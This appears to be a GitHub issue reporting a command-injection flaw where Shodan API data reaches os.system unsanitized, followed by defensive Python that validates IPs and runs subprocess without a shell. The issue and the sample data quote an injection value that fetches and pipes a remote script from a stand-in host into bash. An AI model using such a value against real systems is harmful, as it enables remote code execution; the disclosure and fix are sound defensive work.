
Security issue with os.system call #8

@nma-io


The os.system call does not properly sanitize input collected from Shodan.

It's likely SHODAN isn't going to do something bad, but in the unlikely event the API is compromised or someone wants to cause harm, the os.system calls should be properly sanitized or passed to subprocess.Popen without shell=True. Example: ip=; wget badsite.com/badcode.sh|bash;
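An added example, not part of the original issue or the project's code: one way to apply the suggested fix is to validate each API-supplied value as an IP literal and pass it to the child process as a single argv element, with no shell involved. The `ip_str` field name, the sample records and the echo stand-in for the external tool are assumptions made for illustration.

```python
import ipaddress
import subprocess
import sys

# Stand-in for the external tool the script launches (assumption): a child
# Python process that only echoes the arguments it received.
ECHO_TOOL = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]

# Constructed records shaped like API results; "ip_str" is an assumed field name.
SAMPLE_RESULTS = [
    {"ip_str": "198.51.100.7"},
    {"ip_str": "2001:db8::1"},
    {"ip_str": "; wget badsite.com/badcode.sh|bash;"},  # value quoted in the issue
    {"ip_str": "not-an-ip"},
]


def validate_ip(value):
    """Return the canonical form of an IPv4/IPv6 literal, or raise ValueError."""
    return str(ipaddress.ip_address(value))


def run_tool(tool_argv, target):
    """Run the tool with target as exactly one argv element; no shell parses it."""
    proc = subprocess.run([*tool_argv, target], shell=False,
                          capture_output=True, text=True, timeout=30, check=True)
    return proc.stdout.strip()


def scan_results(records, tool_argv=ECHO_TOOL):
    """Run the tool on records that hold a valid IP; collect the rejected values."""
    outputs, rejected = [], []
    for record in records:
        raw = record.get("ip_str", "")
        try:
            ip = validate_ip(raw)
        except ValueError:
            rejected.append(raw)  # log and skip; never forward to a command line
            continue
        outputs.append(run_tool(tool_argv, ip))
    return outputs, rejected


if __name__ == "__main__":
    ran, skipped = scan_results(SAMPLE_RESULTS)
    print("ran:", ran)
    print("rejected:", skipped)
    # Without a shell, metacharacters reach the tool as plain text in one argument.
    print(run_tool(ECHO_TOOL, SAMPLE_RESULTS[2]["ip_str"]))
```

Validation and the list-form argv are independent layers: the first rejects anything that is not an address, the second ensures nothing is ever interpreted by a shell even if validation is bypassed.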
